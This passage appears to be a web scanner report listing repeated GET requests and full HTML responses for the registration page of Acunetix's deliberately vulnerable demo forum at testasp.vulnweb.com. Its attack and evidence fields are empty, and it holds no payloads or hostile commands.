</tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" 